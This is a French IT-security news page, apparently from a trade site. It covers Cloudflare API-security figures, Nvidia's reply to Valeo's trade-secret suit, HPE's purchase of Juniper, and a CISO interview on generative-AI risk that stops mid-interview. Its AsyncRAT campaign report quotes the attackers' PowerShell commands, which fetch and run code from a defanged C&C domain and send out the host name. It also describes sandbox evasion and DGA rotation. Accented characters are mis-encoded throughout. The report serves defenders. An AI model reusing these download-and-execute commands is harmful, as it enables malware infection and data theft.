Selon Cloudflare, les applications qui n’ont pas Ă©tĂ© gĂ©rĂ©es ou sĂ©curisĂ©es par l’entreprise qui les utilise, aussi appelĂ©es Shadow API ou API fantĂ´mes, sont souvent introduites par des dĂ©veloppeurs ou des utilisateurs individuels pour exĂ©cuter des fonctions mĂ©tiers spĂ©cifiques. « Une Ă©tude rĂ©alisĂ©e par nos soins a rĂ©vĂ©lĂ© des pourcentages Ă©levĂ©s (67 %) d’API ouvertes au public, d’API connectant des applications avec des partenaires (64 %) et d’API connectant des microservices (51 %), ainsi que des taux Ă©levĂ©s de mises Ă  jour d’API, dont 35 % d’actualisations quotidiennes et 40 % hebdomadaires », a encore dĂ©clarĂ© Melinda Marks. « Ce problème est donc liĂ© Ă  l’augmentation constante du nombre d’API et accroĂ®t le risque que des pirates veuillent tirer parti de vulnĂ©rabilitĂ©s qui sont gĂ©nĂ©ralement le rĂ©sultat d’une nĂ©gligence », a-t-elle ajoutĂ©.
L’attaque DDoS, principale menace
52% de toutes les erreurs d’API traitĂ©es par Cloudflare ont Ă©tĂ© attribuĂ©es au code d’erreur 429, qui est un code d’Ă©tat HTTP qui alerte contre l’excès de requĂŞtes. Cette constatation est corroborĂ©e par le fait que 33 % des mesures d’attĂ©nuation des API consistaient Ă  bloquer les dĂ©nis de service distribuĂ©s (Distributed Denial of Service, DDoS). « Les attaques DoS et DDoS, sont souvent sous-estimĂ©es ou oubliĂ©es, alors que c’est un domaine important », a dĂ©clarĂ© l’analyste. « La capacitĂ© Ă  bloquer les attaques DoS/DDoS est donc souvent une prioritĂ© pour la sĂ©curitĂ© des API ». Parmi les autres principales erreurs d’API figurent les mauvaises requĂŞtes (code erreur 400) (13,8 %), les requĂŞtes non trouvĂ©es (code erreur 404) (10,8 %) et les requĂŞtes non autorisĂ©es (code erreur 401) (10,3 %). « Les applications actuelles sont plus complexes et plus riches en fonctionnalitĂ©s, avec un nombre croissant d’API qui contribuent Ă  fournir des fonctionnalitĂ©s complexes, mais cela augmente le risque de sĂ©curitĂ©, car chaque API est une surface d’attaque », a dĂ©clarĂ© Melinda Marks.
« Nos rĂ©centes Ă©tudes ont montrĂ© qu’au cours des 12 derniers mois, 92% des entreprises ont Ă©tĂ© confrontĂ©es Ă  un incident de sĂ©curitĂ© API, au moins, avec comme consĂ©quence l’exposition des donnĂ©es, la prise de contrĂ´le des comptes, l’attaque par dĂ©ni de service, etc. Selon Cloudflare, les entreprises peuvent se protĂ©ger contre les abus d’API en mettant en Ĺ“uvre des pratiques pouvant inclure l’unification de la gestion, de la performance et de la sĂ©curitĂ© de l’API avec le cloud de connectivitĂ©, la mise en Ĺ“uvre d’un modèle de « sĂ©curitĂ© positive » avec la passerelle API qui n’autorise que le trafic reconnu comme « bon » plutĂ´t que d’interdire le trafic reconnu comme « mauvais », l’utilisation de technologies d’apprentissage machine pour la rĂ©duction des coĂ»ts et la sĂ©curitĂ©, et la mesure de la maturitĂ© de l’API au fil du temps.

Sécurité informatique

Une campagne AsyncRAT vise depuis des mois des infrastructures US clés

Des attaquants à la manoeuvre derrière le trojan open source AsyncRAT ont utilisé plus de 300 échantillons de cet outil malveillant et plus de 100 domaines pour passer sous le radar.
Au cours des 11 derniers mois, un cybergang a ciblĂ© les employĂ©s de diverses entreprises avec des courriels d’hameçonnage distribuant un programme trojan open source appelĂ© AsyncRAT. Parmi les cibles figuraient des entreprises gĂ©rant des infrastructures clĂ©s aux États-Unis. Selon la division de cybersĂ©curitĂ© Alien Labs d’AT&T, l’infrastructure de commande et de contrĂ´le (C&C) des attaquants utilise un algorithme de gĂ©nĂ©ration de domaines (Domain Generation Algorithm, DGA) pour effectuer une rotation entre un grand nombre de domaines pour rendre le blocage du trafic plus difficile. Et aussi gĂ©nĂ©rer de nouveaux Ă©chantillons de l’outil malveillant pour Ă©viter d’ĂŞtre dĂ©tectĂ©s. Les chercheurs ont identifiĂ© plus de 300 Ă©chantillons et 100 domaines associĂ©s Ă  cette campagne.
« PubliĂ© en 2019, l’outil d’accès Ă  distance open source AsyncRAT est toujours disponible sur Github », indiquent les chercheurs dans leur rapport. « Comme tout outil d’accès Ă  distance, il peut ĂŞtre exploitĂ© comme un cheval de Troie d’accès Ă  distance (Remote Access Trojan, RAT), en particulier quand il est libre d’accès et d’utilisation comme c’est le cas ici. C’est une des raisons pour laquelle ce RAT est l’un des plus couramment utilisĂ©s. AsyncRAT se caractĂ©rise notamment par sa fonction d’enregistreur de frappes, les techniques d’exfiltration et/ou la mise en place d’un accès initial en vue de dĂ©livrer une charge utile finale. Il n’est pas rare que des acteurs malveillants, mĂŞme chevronnĂ©s, utilisent des frameworks et des outils de logiciels malveillants open source. En effet, ils prĂ©sentent plusieurs avantages, notamment des coĂ»ts de dĂ©veloppement peu Ă©levĂ©s par rapport aux outils personnalisĂ©s et un moindre risque puisque ces outils ne sont pas associĂ©s Ă  un acteur en particulier. En fait, AsyncRAT lui-mĂŞme a Ă©tĂ© utilisĂ© en 2022 par un groupe APT que l’entreprise de sĂ©curitĂ© Trend Micro identifie comme Earth Berberoka aka GamblingPuppet.
Des scripts de livraison bien obfusqués
Les courriels de phishing analysĂ©s par Alien Labs et d’autres chercheurs, dont Igal Lytzki de Microsoft, utilisaient une technique de dĂ©tournement de thread pour diriger les utilisateurs vers une page d’hameçonnage, laquelle finissait par dĂ©poser un fichier JavaScript (.js) sur les ordinateurs des utilisateurs. Une fois ouvert dans le bloc-notes, le script faisait apparaĂ®tre un grand nombre de mots anglais alĂ©atoires commentĂ©s. Par le passĂ©, dans le cadre d’autres campagnes, des chercheurs ont Ă©galement signalĂ© des variantes du script avec des caractères sanskrits. Le script est fortement obfusqué par des fonctions qui cachent et extraient le code malveillant rĂ©el de diffĂ©rentes parties du fichier. Son objectif est de tĂ©lĂ©charger la charge utile de deuxième Ă©tape Ă  partir d’une URL, elle-mĂŞme codĂ©e Ă  l’aide d’un chiffrement personnalisĂ© et de valeurs dĂ©cimales au lieu de caractères ASCII.
La charge utile se prĂ©sente sous forme d’un autre script codĂ© Ă©crit en PowerShell, exĂ©cutĂ© directement en mĂ©moire sans ĂŞtre sauvegardĂ© sur le disque avec une commande “conhost -headless powershell iex(curl -useb sduyvzep[.]top/1.php?hash=)”. Le domaine du serveur C&C fait l’objet d’une rotation pĂ©riodique. Le script PowerShell exĂ©cute encore un autre script PowerShell en invoquant la commande iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:computername&key=$wiqnfex”). Celle-ci envoie des informations au serveur C&C, comme le nom d’hĂ´te de l’ordinateur et une variable appelĂ©e $wiqnfex qui indique si l’ordinateur est plutĂ´t une machine virtuelle ou un bac Ă  sable. Cette valeur est dĂ©finie après vĂ©rification par le premier script de l’adaptateur de la carte graphique et le BIOS du système, et leur Ă©mulation possible dans une machine virtuelle. Si le serveur C&C dĂ©termine que $wiqnfex indique une cible valide, il dĂ©ploie AsyncRAT. Si la valeur de la variable indique une VM ou un bac Ă  sable possible, il redirige la demande vers Google ou vers un script PowerShell diffĂ©rent qui tĂ©lĂ©charge et lance un leurre RAT. « Une fois dĂ©compilĂ©, le RAT fait office de leurre pour les chercheurs qui scrutent la campagne », expliquent les chercheurs d’Alien Lab. « Plusieurs raisons expliquent pourquoi l’Ă©chantillon se fait passer pour RAT. Le nom de l’assemblage est DecoyClient, et la configuration n’est pas chiffrĂ©e comme elle le serait dans un Ă©chantillon AsyncRAT. De plus, l’Ă©chantillon ne contient pas de serveur C&C, mais uniquement des adresses de bouclage. Enfin, parmi les donnĂ©es Ă  exfiltrer vers le C&C, on trouve la chaĂ®ne de caractères “LOL” ».
Un domaine de commande et de contrôle supplémentaire chaque semaine
En plus de rendre rĂ©gulièrement alĂ©atoire le code des scripts et les Ă©chantillons de logiciels malveillants pour Ă©chapper Ă  la dĂ©tection, les attaquants changent Ă©galement de domaine de commande et de contrĂ´le (C&C) chaque semaine. Cependant, les chercheurs d’Alien Lab ont rĂ©ussi Ă  rĂ©aliser une rĂ©tro-ingĂ©nierie de l’algorithme de gĂ©nĂ©ration de domaines, qui, avec plusieurs autres constantes comme le domaine de premier niveau (Top Level Domain, TLD) (.top), le registrar, c’est-Ă -dire le bureau d’enregistrement du nom de domaine, et le nom de l’organisation utilisĂ©s pour enregistrer les domaines, ont pu trouver les domaines utilisĂ©s dans le passĂ© et obtenir des Ă©chantillons antĂ©rieurs des scripts de dĂ©ploiement. « Ces domaines prĂ©sentent les mĂŞmes caractĂ©ristiques que celles mentionnĂ©es prĂ©cĂ©demment, Ă  la diffĂ©rence qu’ils sont composĂ©s de 15 caractères », expliquent les chercheurs. « Cela nous permet de pivoter et de trouver des Ă©chantillons historiques basĂ©s sur l’algorithme de gĂ©nĂ©ration de domaines (DGA), mais aussi de construire des dĂ©tections pour identifier les infrastructures futures malgrĂ© tous leurs efforts pour Ă©chapper Ă  l’EDR (Endpoint Detection and Response) et aux dĂ©tections statiques ». Le rapport de la division de cybersĂ©curitĂ© Alien Labs d’AT&T comprend des signatures de dĂ©tection pour cette campagne, utilisables avec le système de dĂ©tection d’intrusion open-source Suricata, ainsi qu’une liste d’indicateurs de compromission (Indicators of Compromise, IOC) qui peuvent servir Ă  construire des dĂ©tections pour d’autres systèmes.

Sécurité informatique

Nvidia dément avoir volé du code à Valeo

Dans l’affaire l’opposant Ă  Valeo, Nvidia affirme avoir dĂ©veloppĂ© sa propre technologie pour les vĂ©hicules autonomes. Le fournisseur souligne qu’il n’a ni voulu, ni eu besoin des prĂ©tendus secrets commerciaux de l’Ă©quipementier automobile.
La parole est Ă  la dĂ©fense dans l’affaire de vol de secrets commerciaux de Valeo par Nvidia. Le spĂ©cialiste des accĂ©lĂ©rateurs GPU a en effet rĂ©pondu aux allĂ©gations avec une enquĂŞte montrant qu’il n’avait trouvĂ© aucune trace de code de Valeo dans ses systèmes internes. Pour mĂ©moire, Ă  l’occasion d’une visioconfĂ©rence, un ex-employĂ© de Valeo, Mohammad Moniruzzaman, recrutĂ© par Nvidia a partagĂ© du code source dĂ©robĂ© chez l’Ă©quipementier automobile pour le dĂ©veloppement d’un logiciel d’aide au stationnement. Il a Ă©tĂ© condamnĂ© par la justice allemande, mais Valeo a dĂ©cidĂ© de porter plainte contre Nvidia aux Etats-Unis pour vol de secrets commerciaux.
Mais Nvidia a totalement niĂ© ces accusations et demandĂ© Ă  un tribunal de dĂ©bouter le plaignant avec dĂ©pens. « Nvidia n’a jamais voulu ou eu besoin des prĂ©tendus secrets commerciaux de Valeo, mais elle n’en a pas non plus l’usage pratique », a dĂ©clarĂ© l’entreprise dans son mĂ©moire, expliquant que l’utilisation par Valeo de technologies conventionnelles plus anciennes et de composants spĂ©cifiques pour diffĂ©rentes zones du vĂ©hicule Ă©tait totalement diffĂ©rente de l’approche intĂ©grĂ©e de bout en bout de Nvidia.
L’employĂ© de Valeo a agi de son propre chef
Selon la plainte dĂ©posĂ©e au tribunal, Mohammad Moniruzzaman a fourni des dĂ©clarations sous serment indiquant qu’il n’avait jamais partagĂ© le code ou les documents de Valeo avec d’autres employĂ©s de Nvidia, Ă  l’exception d’un partage d’Ă©cran accidentel lors d’une visioconfĂ©rence qui a durĂ© moins de cinq minutes. « Les dĂ©clarations sous serment que Mr Moniruzzaman a soumis au tribunal allemand Ă©tablissent qu’il a agi seul, qu’il n’a informĂ© personne chez Nvidia de ses actions et qu’il n’a jamais partagĂ© les prĂ©tendus secrets commerciaux de Valeo avec Nvidia », peut-on lire dans le document. « Les employĂ©s de Nvidia qui ont travaillĂ© avec M. Moniruzzaman ont Ă©galement dĂ©clarĂ© qu’ils n’ont jamais eu connaissance, et encore moins utilisĂ©, les prĂ©tendus secrets commerciaux de Valeo ».
Le spĂ©cialiste des accĂ©lĂ©rateurs GPU a accusĂ© Valeo d’avoir lancĂ© des allĂ©gations infondĂ©es et fausses en Allemagne, selon lesquelles l’entreprise aurait rĂ©solument recherchĂ© le code de Valeo et l’aurait utilisĂ© pour dĂ©velopper ses produits. L’équipementier automobile a demandĂ© Ă  un tribunal allemand de nommer un expert indĂ©pendant pour inspecter la base de code de la firme amĂ©ricaine afin d’y rechercher tout code de Valeo et, après des investigations approfondies, l’expert n’a trouvĂ© aucune preuve de la prĂ©sence de ce code dans celui de l’accusĂ©. Le tribunal allemand a en outre accordĂ© des dĂ©dommagements Ă  Nvidia sur ce point. Le fournisseur US a aussi dĂ©clarĂ© qu’il avait supprimĂ© tous les codes auxquels Mohammad Moniruzzamanavait contribuĂ© pendant cette pĂ©riode.
Une protection des données inefficace
MĂŞme si Nvidia nie avoir utilisĂ© le code de Valeo dans ses systèmes, l’entreprise a soulignĂ© que les efforts de Valeo pour protĂ©ger ses prĂ©tendus secrets commerciaux Ă©taient « inefficaces et dĂ©raisonnables ». « L’ancien employĂ© a pu copier et tĂ©lĂ©charger une quantitĂ© importante de prĂ©tendus secrets commerciaux de Valeo en utilisant des techniques rudimentaires », peut-on lire dans la plainte. « MĂŞme si l’ex-salariĂ© a prĂ©tendument tĂ©lĂ©chargĂ© ces donnĂ©es en avril 2021, Valeo n’a repĂ©rĂ© cette activitĂ© qu’après le 8 mars 2022 ». Nvidia affirme par ailleurs que l’équipementier a failli dans sa communication avec lui.

Sécurité informatique

HPE acquiert Juniper Networks pour 14 Md$

Après les rĂ©vĂ©lations du WSJ, Hewlett Packard Enterprise a confirmĂ© sa volontĂ© de racheter Juniper Networks. Initialement prĂ©vue Ă  13 Md$, cette opĂ©ration est finalement bouclĂ©e Ă  14 Md$. Avec cette acquisition, HPE entend renforcer son portefeuille rĂ©seau, notamment dans le cadre de sa stratĂ©gie vers l’IA.
Il n’aura pas fallu attendre bien longtemps pour que Hewlett Packard Enterprise confirme son intention d’acquérir Juniper Networks. Le Wall Street Journal avait vendu la mèche en parlant d’une opération estimée à 13 milliards de dollars. HPE a été obligé de rajouter 1 milliard pour l’emporter à 14 Md$ en proposant un rachat en cash à 40 $ par action. Une prime importante par rapport au cours de bourse de l’action Juniper Networks qui s’était stabilisé à 30 dollars. Elle a grimpé à 36 dollars avec la publication des rumeurs de rachat.
Dans son communiquĂ©, HPE prĂ©cise que l’acquisition aura pour effet de doubler la taille de son activitĂ© rĂ©seau existante. Si l’accord est conclu, soit Ă  la fin de cette annĂ©e, soit au dĂ©but 2025, le segment rĂ©seau de HPE devrait contribuer Ă  plus de la moitiĂ© de son bĂ©nĂ©fice d’exploitation annuel. OpĂ©ration de consolidation dans le marchĂ© du rĂ©seau, il faudra regarder avec attention les demandes de validation auprès des autoritĂ©s rĂ©glementaires qui sont assez tatillonnes sur la concurrence. Au terme du rachat, Rami Rahim, CEO de Juniper, chapeautera la branche rĂ©seau de HPE.
Un cap IA clairement revendiqué
S’il existe des chevauchements dans le catalogue des deux sociĂ©tĂ©s, sur la partie campus et datacenter, HPE prĂ©fère parler des apports de Juniper sur le marchĂ© de l’IA. En effet, ce dernier propose un service d’IA connu sous le nom de Mist AI (issu d’une sociĂ©tĂ© acquise en 2019 pour 405 M$), qui utilise des algorithmes d’apprentissage automatique pour gĂ©rer de manière proactive les rĂ©seaux filaires et sans-fil. Ce service se sert aussi de l’IA pour piloter la sĂ©curitĂ© rĂ©seau. RĂ©cemment, il a dĂ©voilĂ© Marvis, son assistant conversationnel basĂ© sur ChatGPT pour dĂ©tecter, dĂ©crire et aider Ă  rĂ©soudre une myriade de problèmes de rĂ©seau, notamment des clients filaires ou sans fil dĂ©faillants persistants, des câbles dĂ©fectueux, des trous de couverture des points d’accès, des liaisons WAN problĂ©matiques et une capacitĂ© de radiofrĂ©quence insuffisante.
Dans un billet de blog, Rami Rahim, a indiquĂ© « HPE apporte des annĂ©es d’expĂ©rience dans le calcul haute performance, y compris des technologies d’interconnexion comme Slingshot, des solutions de refroidissement liquide et des serveurs GPU qui s’appliquent toutes Ă  la rĂ©volution actuelle des centres de donnĂ©es IA ». Il ajoute, « en combinant notre solution d’automatisation basĂ©e sur l’intention Apstra, qui a dĂ©jĂ  simplifiĂ© les opĂ©rations DC des clients du monde entier, et nos commutateurs QFX et nos routeurs de la sĂ©rie PTX, nous nous positionnerons pour ĂŞtre un pionnier dans le dĂ©veloppement d’une solution complète pour les clients et construire des centres de donnĂ©es dĂ©diĂ©s Ă  l’IA ».
D’autres apports dans les télécoms et l’automatisation des datacenters
Les analystes sont globalement positifs sur ce rapprochement. Ce dernier valide la stratĂ©gie de Juniper Networks qui a fait de Mist AI la pierre angulaire de son activitĂ© rĂ©seau d’entreprise. Cette branche reprĂ©sente 38% de son chiffre d’affaires lors des derniers rĂ©sultats trimestriels et la sociĂ©tĂ© prĂ©voyait un doublement des ventes dans les trois prochaines annĂ©es. De son cĂ´tĂ©, HPE va mettre Ă  disposition ses canaux de distribution et de commercialisation pour accĂ©lĂ©rer ces objectifs notamment autour de son architecture nativement IA dĂ©voilĂ©e lors du Discover Europe Ă  la fin de l’annĂ©e 2023.
Mais l’acquisition comprend d’autres intĂ©rĂŞts pour HPE. En effet, selon Will Townsend, vice-prĂ©sident et analyste principal, et Patrick Moorhead, fondateur de Moor Insight, « en plus de donner Ă  HPE plus de profondeur en matière d’IA, Juniper apporte Ă©galement des atouts en matière d’infrastructure de fournisseur de services de communication ». Ils parlent notamment de la plateforme RAN Intelligent Controller (RIC) de Juniper et la base installĂ©e des opĂ©rateurs de rĂ©seaux mobiles. « Cela peut ĂŞtre une aubaine pour la division tĂ©lĂ©com de HPE qui a rĂ©cemment acquis Athonet dans le domaine des dĂ©ploiements de rĂ©seaux cellulaires privĂ©s ». Il viendrait concurrencer Dell Technologies, qui « a mĂ»ri son offre tĂ©lĂ©coms », assurent les consultants. Sur la partie purement rĂ©seau, Juniper apporte notamment la plateforme Apstra, comprenant des fonctionnalitĂ©s d’automatisation du datacenter. Depuis l’acquisition d’Apstra en 2021, la firme a renforcĂ© la plate-forme avec des fonctionnalitĂ©s telles que l’automatisation, des capacitĂ©s de configuration intelligentes, une prise en charge matĂ©rielle et logicielle multifournisseur et des analyses environnementales amĂ©liorĂ©es. L’intĂ©gration avec HPE pourrait encore renforcer cette plateforme.

Sécurité informatique

Prabhath Karanth, RSSI de Navan : « Nous ne pouvons pas adopter aveuglĂ©ment l’IA gĂ©nĂ©rative »

DĂ©but 2023, la sociĂ©tĂ© de gestion des voyages et des dĂ©penses Navan a choisi d’adopter la technologie d’IA gĂ©nĂ©rative pour une myriade d’utilisations commerciales et d’assistance Ă  la clientèle. Une dĂ©cision impliquant des mesures pour Ă©viter les dĂ©rives et problèmes de sĂ©curitĂ©.
Originaire de Palo Alto en Californie, Navan (ex-TripActions) s’est tournĂ© en fĂ©vrier 2023 vers ChatGPT d’OpenAI et les outils d’aide au codage de GitHub Copilot pour Ă©crire, tester et corriger le code. Avec, Ă  la clĂ©, une meilleure efficacitĂ© opĂ©rationnelle et une rĂ©duction des frais gĂ©nĂ©raux. Les outils d’IA gĂ©nĂ©rative ont Ă©galement Ă©tĂ© utilisĂ©s pour crĂ©er une expĂ©rience conversationnelle pour l’assistant virtuel client de l’entreprise, Ava. Ce chatbot pour les voyages et les dĂ©penses, apporte aux clients des rĂ©ponses Ă  leurs questions et une expĂ©rience de rĂ©servation conversationnelle. Il peut Ă©galement fournir des donnĂ©es aux voyageurs d’affaires, telles que les dĂ©penses de voyage de l’entreprise, le volume et les dĂ©tails granulaires des Ă©missions de carbone.
Grâce Ă  l’IA gĂ©nĂ©rative, bon nombre des 2 500 employĂ©s de Navan ont pu Ă©liminer les tâches redondantes et crĂ©er du code beaucoup plus rapidement que s’ils l’avaient créé de toute pièce. Cependant, les outils d’IA gĂ©nĂ©rative ne sont pas exempts de risques en matière de sĂ©curitĂ© et de rĂ©glementation. Par exemple, 11 % des donnĂ©es que les employĂ©s collent dans ChatGPT sont confidentielles, selon un rapport du fournisseur de cybersĂ©curitĂ© CyberHaven. Navan dispose d’une licence pour ChatGPT, mais l’entreprise a proposĂ© Ă  ses employĂ©s d’utiliser leurs propres instances publiques de la technologie, ce qui peut entraĂ®ner des fuites de donnĂ©es en dehors des murs de l’entreprise. Celle-ci a donc dĂ©cidĂ© de limiter les fuites et autres menaces en utilisant des outils de surveillance et en appliquant un ensemble de directives claires. Un outil SaaS, par exemple, signale Ă  un employĂ© qu’il est sur le point d’enfreindre la politique de l’entreprise, ce qui a permis de sensibiliser davantage les travailleurs Ă  la sĂ©curitĂ©, selon Prabhath Karanth, RSSI de Navan. Des moyens ont Ă©tĂ© mis en place pour protĂ©ger l’entreprise contre les abus et les menaces intentionnelles ou non liĂ©es Ă  l’IA gĂ©nĂ©rative comme l’explique ainsi le responsable.
Lucas Mearian : Pour quelles raisons votre entreprise utilise-t-elle ChatGPT ?
Prabhath Karanth : L’IA existe depuis longtemps, mais son adoption dans les entreprises pour rĂ©soudre des problèmes spĂ©cifiques est passĂ©e cette annĂ©e Ă  un tout autre niveau. Navan a Ă©tĂ© l’un des premiers Ă  l’adopter. Nous avons Ă©tĂ© l’une des premières entreprises du secteur des voyages et des dĂ©penses Ă  rĂ©aliser que cette technologie allait ĂŞtre disruptive. Nous l’avons adoptĂ©e très tĂ´t dans les flux de travail de nos produits… Et aussi dans nos opĂ©rations internes.
Workflows produits, opĂ©rations internes… Les chatbots utilisĂ©s aident-ils les employĂ©s Ă  rĂ©pondre aux questions et les clients aussi ?
Il existe quelques applications du cĂ´tĂ© des produits. Nous avons un assistant de workload appelĂ© Ava, qui est un chatbot alimentĂ© par cette technologie. Notre produit offre une multitude de fonctionnalitĂ©s. Par exemple, un tableau de bord permet Ă  un administrateur de consulter des informations sur les voyages et les dĂ©penses de son entreprise. Et en interne, pour alimenter nos opĂ©rations, nous avons cherchĂ© Ă  savoir comment nous pouvions accĂ©lĂ©rer le dĂ©veloppement de logiciels. MĂŞme du point de vue de la sĂ©curitĂ©, j’Ă©tudie de très près tous les outils qui me permettent de tirer parti de cette technologie. Cela s’applique Ă  l’ensemble de l’entreprise.
Certains dĂ©veloppeurs qui ont utilisĂ© la technologie d’IA gĂ©nĂ©rative pensent qu’elle est efficace. Ils disent que le code qu’elle gĂ©nère est parfois absurde. Que vous disent vos dĂ©veloppeurs sur l’utilisation de l’IA pour Ă©crire du code ?
Cela n’a pas Ă©tĂ© le cas ici. Nous avons eu une très bonne adoption par la communautĂ© des dĂ©veloppeurs, en particulier dans deux domaines. Le premier est l’efficacitĂ© opĂ©rationnelle ; les dĂ©veloppeurs n’ont plus besoin d’Ă©crire du code Ă  partir de zĂ©ro, du moins pour les bibliothèques standard et les outils de dĂ©veloppement. Nous constatons de très bons rĂ©sultats. Nos codeurs sont en mesure d’obtenir un certain pourcentage de ce dont ils ont besoin, puis de construire Ă  partir de lĂ . Dans certains cas, nous utilisons des bibliothèques de code open source – c’est le cas de tous les dĂ©veloppeurs – et donc, pour l’obtenir et s’en servir pour Ă©crire du code, c’est un autre domaine oĂą cette technologie est utile. Je pense qu’il y a certaines façons de l’adopter. On ne peut pas l’adopter aveuglĂ©ment. On ne peut pas l’adopter dans tous les contextes, or le contexte est essentiel. 
Utilisez-vous d’autres outils que ChatGPT ?
Pas vraiment dans le contexte de l’entreprise. Du cĂ´tĂ© des codeurs, nous utilisons Ă©galement Github Copilot dans une certaine mesure. Mais dans le contexte non-dĂ©veloppeur, c’est surtout OpenAI.
Comment classeriez-vous l’IA en termes de menace potentielle pour la sĂ©curitĂ© de votre entreprise ?
Je ne dirais pas qu’il s’agit de la menace la plus grave, mais plutĂ´t d’un nouveau vecteur de menace qu’il convient d’attĂ©nuer au moyen d’une stratĂ©gie globale. Il s’agit de gĂ©rer les risques. L’attĂ©nuation n’est pas seulement une question de technologie. La technologie et les outils sont un aspect, mais il faut Ă©galement mettre en place une gouvernance et des politiques sur la manière dont vous utilisez cette technologie en interne et la produisez. Il faut Ă©valuer les risques liĂ©s aux personnes, aux processus et Ă  la technologie, puis les attĂ©nuer. Une fois que cette politique d’attĂ©nuation est en place, le risque est rĂ©duit. Si vous ne faites pas tout cela, alors oui, l’IA est le vecteur le plus risquĂ©.
Quels types de problèmes avez-vous rencontrĂ© avec des employĂ©s utilisant ChatGPT ? Les avez-vous surpris en train de copier et coller des informations sensibles de l’entreprise dans des fenĂŞtres d’invite ?
Chez Navan, nous essayons toujours d’avoir une longueur d’avance ; c’est tout simplement la nature de notre activitĂ©. Lorsque l’entreprise a dĂ©cidĂ© d’adopter cette technologie, l’Ă©quipe de sĂ©curitĂ© a dĂ» procĂ©der Ă  une Ă©valuation globale des risques… Je me suis donc assis avec mon Ă©quipe de direction pour le faire. La structure de mon Ă©quipe de direction est la suivante : un responsable de la sĂ©curitĂ© des plateformes de produits, qui se trouve du cĂ´tĂ© de l’ingĂ©nierie ; ensuite, nous avons SecOps, qui est une combinaison de sĂ©curitĂ© d’entreprise, DLP – dĂ©tection et rĂ©ponse ; puis il y a une fonction de gouvernance, de risque, de conformitĂ© et de confiance, qui est responsable de la gestion des risques, de la conformitĂ© et de tout le reste. Nous nous sommes donc assis et avons procĂ©dĂ© Ă  une Ă©valuation des risques pour chaque domaine d’application de cette technologie. Nous avons mis en place certains contrĂ´les, tels que la prĂ©vention de la perte de donnĂ©es, afin de nous assurer que, mĂŞme involontairement, il n’y a pas d’exploitation de cette technologie pour extraire des donnĂ©es, qu’il s’agisse d’IP ou d’informations personnelles identifiables des clients. Je dirais donc que nous avons gardĂ© une longueur d’avance.
Avez-vous encore surpris des employĂ©s en train d’essayer de coller intentionnellement des donnĂ©es sensibles dans ChatGPT ?
La mĂ©thode DLP que nous appliquons ici est basĂ©e sur le contexte. Nous ne faisons pas de blocage gĂ©nĂ©ral. Nous dĂ©tectons toujours les choses et nous les traitons comme un incident. Il peut s’agir d’un risque d’initiĂ© ou d’un risque externe, et nous impliquons alors nos homologues des services juridiques et des ressources humaines. Cela fait partie intĂ©grante de la gestion d’une Ă©quipe de sĂ©curitĂ©. Nous sommes lĂ  pour identifier les menaces et mettre en place des protections contre elles.
Avez-vous Ă©tĂ© surpris par le nombre d’employĂ©s qui collent les donnĂ©es de l’entreprise dans les invites du ChatGPT ?
Pas vraiment. Nous nous y attendions avec cette technologie. L’entreprise s’efforce de faire connaĂ®tre cette technologie aux dĂ©veloppeurs et Ă  d’autres personnes. Nous n’avons donc pas Ă©tĂ© surpris. Nous nous y attendions.
Craignez-vous que l’IA gĂ©nĂ©rative entraĂ®ne une violation des droits d’auteur lorsque vous l’utilisez pour la crĂ©ation de contenu ?
Il s’agit d’un domaine de risques qui doit ĂŞtre abordĂ©. Vous avez besoin d’une certaine expertise juridique pour ce domaine. Nos conseillers juridiques internes et notre Ă©quipe de juristes se sont penchĂ©s sur la question, et nous avons activĂ© tous nos programmes juridiques. Nous avons essayĂ© de gĂ©rer le risque dans ce domaine. Navan a mis l’accent sur la communication entre les Ă©quipes chargĂ©es de la protection de la vie privĂ©e, de la sĂ©curitĂ© et des questions juridiques et ses Ă©quipes chargĂ©es des produits et du contenu sur les nouvelles lignes directrices et restrictions au fur et Ă  mesure qu’elles apparaissent; et les employĂ©s ont reçu une formation supplĂ©mentaire sur ces questions.
Êtes-vous au courant du problème lié à la création de logiciels malveillants par ChatGPT, intentionnellement ou non ? Avez-vous dû y remédier ?
Je suis un professionnel de la sĂ©curitĂ© et je surveille donc de très près tout ce qui se passe du cĂ´tĂ© offensif. Il y a toutes sortes d’applications. Il y a des logiciels malveillants, il y a de l’ingĂ©nierie sociale qui se produit grâce Ă  l’IA gĂ©nĂ©rative. Je pense que la dĂ©fense doit constamment rattraper son retard. J’en suis tout Ă  fait conscient.
Comment surveiller la prĂ©sence de logiciels malveillants si un employĂ© utilise ChatGPT pour crĂ©er du code ? Disposez-vous d’outils logiciels ou avez-vous besoin d’une deuxième paire d’yeux sur tous les codes nouvellement créés ?
Il y a deux possibilitĂ©s. La première consiste Ă  s’assurer que le code que nous envoyons Ă  la production est sĂ©curisĂ©. L’autre est le risque d’initiĂ© – s’assurer que le code gĂ©nĂ©rĂ© ne quitte pas l’environnement de l’entreprise Navan. Pour le premier volet, nous disposons d’une intĂ©gration continue, d’un dĂ©ploiement continu – CICD – d’un pipeline de co-dĂ©ploiement automatisĂ©, qui est entièrement sĂ©curisĂ©. Tout code envoyĂ© Ă  la production fait l’objet d’un code statique au point d’intĂ©gration, avant que les dĂ©veloppeurs ne le fusionnent avec une branche. Nous disposons Ă©galement d’une analyse de la composition du logiciel pour tout code tiers injectĂ© dans l’environnement. En outre, le CICD durcit l’ensemble du pipeline, de la fusion Ă  la branche jusqu’au dĂ©ploiement. En plus de tout cela, nous avons Ă©galement des tests d’API en cours d’exĂ©cution et des tests d’API en cours de construction. Nous disposons Ă©galement d’une Ă©quipe de sĂ©curitĂ© des produits qui s’occupe de la modĂ©lisation des menaces et de la rĂ©vision de la conception de toutes les fonctionnalitĂ©s critiques qui sont livrĂ©es Ă  la production. La deuxième partie – le risque d’initiĂ© – est liĂ©e Ă  notre stratĂ©gie DLP, qui consiste Ă  dĂ©tecter les donnĂ©es et Ă  y rĂ©pondre. Nous ne procĂ©dons pas Ă  un blocage gĂ©nĂ©ral, mais Ă  un blocage basĂ© sur le contexte, sur de nombreuses zones de contexte. Nous avons obtenu des dĂ©tections relativement prĂ©cises et nous avons pu protĂ©ger l’environnement informatique de Navan.
Pouvez-vous nous parler d’outils particuliers que vous avez utilisĂ©s pour renforcer votre profil de sĂ©curitĂ© contre les menaces liĂ©es Ă  l’IA ?
